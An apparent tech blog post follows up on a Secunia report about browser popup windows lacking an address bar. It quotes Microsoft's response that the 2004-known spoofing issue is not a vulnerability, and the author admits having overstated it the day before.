Microsoft responds to the latest vulnerability report from Secunia, we covered it here yesterday, in a post at the Microsoft Security Response Center Blog titled Information on New Address Bar Issue. Apparently, this was a known issue with the way browsers are designed in that browsers are allowed to load pages in browser windows from other sites, this allows them to reuse windows. You’ve all seen it, you click a link, it opens in another window, you go back to click another link, or go to another page and click a link and it opens in the same window, unless you’ve closed it.
Like we always do, we investigated that claim thoroughly in 2004. We found that in all cases, for this to represent a threat for phishing or spoofing attacks, a user would have to decide to trust the authenticity of the page without verifying the page?s address (because there was no address bar) and without verifying an SSL connection (like we recommend on our website). In other words, the scenario requires that you intentionally not use the security features specifically put in place to help protect against phishing and spoofing attacks. Because of that, we said in 2004 that this issue doesn?t represent a security vulnerability as we have defined it on our website. Source: Microsoft Security Response Center Blog
Microsoft even said in their post that they looked at how they could make this better for users, and since the user would have to ignore or not see the address bar, if the page changed, that they would add the address bar even in popup windows, so you could always the actual url. A lesson to be learned would be you can’t always trust every website you are on.
Now, yesterday, when I posted it, I admit I did not read the whole posting, so I did not realize that it was an old “vulnerability”, I assumed, as many did I’m sure, that it was a new issue. So, I helped spread a little bit of this nonsense, but Secunia should bear most of the responsibility. In their quest to report vulnerabilities, they made it look like it was a new one, at least in my eyes. I will be more observant in the future when looking at their reports. Thanks to Spyware Sucks for letting me know I did not report the whole story.